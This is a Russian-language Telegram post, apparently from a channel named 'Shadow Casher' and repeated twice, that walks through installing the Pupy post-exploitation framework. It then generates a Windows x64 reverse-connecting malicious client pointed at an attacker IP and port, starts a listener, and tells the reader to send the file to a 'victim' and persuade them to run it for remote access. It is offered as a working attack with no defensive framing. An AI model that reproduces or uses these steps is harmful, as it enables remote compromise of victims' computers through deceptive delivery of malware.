Forwarded From Shadow Casher
https://telegra.ph/file/4f0b75be1ad5f1cc84695.jpgPupy — это кросс-платформенный многофункциональный инструмент для пост-эксплуатации, написанный на python. С помощь данного инструмента злоумышленник может получить удаленный доступ к компьютеру под управлением ОС Windows или Linux.
Установка инструмента
Открываем терминал и вводим команду для обновления пакетов:
apt-get update && apt-get upgrade
Устанавливаем все необходимые библиотеки:
sudo apt-get install git libssl1.0-dev libffi-dev python-dev python-pip build-essential swig tcpdump python-virtualenv
Клонируем репозиторий инструмента с GitHub:
git clone https://github.com/n1nj4sec/pupy
Переходим в директорию:
cd pupy
Делаем скрипт установки исполняемым и запускаем:
chmod +x ./install.sh
./install.sh
Ожидаем окончание процесса установки.
Эксплуатация инструмента
После того, как установка будет завершена, запускаем инструмент:
cd pupy
python pupysh.py
Допустим, атакующий компьютер имеет IP-адрес 132.174.12.162 и порт 43210.
Нам нужно взломать компьютер под управлением ОС Windows x64. В таком случае команда для создания вредоносного файла будет выглядеть так:
gen -f client -O windows -A x64 connect --host 132.174.12.162:43210 -t http
После выполнения данной команды в терминале появится полный путь к вредоносному файлу. Но перед тем, как отправить вредоносный файл нашей жертве, мы должны создать слушатель с помощью следующей команды:
listen -a http 43210
, где http — метод доставки полезной нагрузки, а 43210 — открытый порт на атакующем компьютере.
Теперь осталось только оправить нашей жертве ранее созданный вредоносный файл, и уговорить нашу жертву запустить данный файл. Если файл будет запущен жертвой, то мы получим удаленный доступ к компьютеру жертвы.
@ShadowCasher
https://telegra.ph/file/4f0b75be1ad5f1cc84695.jpgPupy — это кросс-платформенный многофункциональный инструмент для пост-эксплуатации, написанный на python. С помощь данного инструмента злоумышленник может получить удаленный доступ к компьютеру под управлением ОС Windows или Linux.
Установка инструмента
Открываем терминал и вводим команду для обновления пакетов:
apt-get update && apt-get upgrade
Устанавливаем все необходимые библиотеки:
sudo apt-get install git libssl1.0-dev libffi-dev python-dev python-pip build-essential swig tcpdump python-virtualenv
Клонируем репозиторий инструмента с GitHub:
git clone https://github.com/n1nj4sec/pupy
Переходим в директорию:
cd pupy
Делаем скрипт установки исполняемым и запускаем:
chmod +x ./install.sh
./install.sh
Ожидаем окончание процесса установки.
Эксплуатация инструмента
После того, как установка будет завершена, запускаем инструмент:
cd pupy
python pupysh.py
Допустим, атакующий компьютер имеет IP-адрес 132.174.12.162 и порт 43210.
Нам нужно взломать компьютер под управлением ОС Windows x64. В таком случае команда для создания вредоносного файла будет выглядеть так:
gen -f client -O windows -A x64 connect --host 132.174.12.162:43210 -t http
После выполнения данной команды в терминале появится полный путь к вредоносному файлу. Но перед тем, как отправить вредоносный файл нашей жертве, мы должны создать слушатель с помощью следующей команды:
listen -a http 43210
, где http — метод доставки полезной нагрузки, а 43210 — открытый порт на атакующем компьютере.
Теперь осталось только оправить нашей жертве ранее созданный вредоносный файл, и уговорить нашу жертву запустить данный файл. Если файл будет запущен жертвой, то мы получим удаленный доступ к компьютеру жертвы.
@ShadowCasher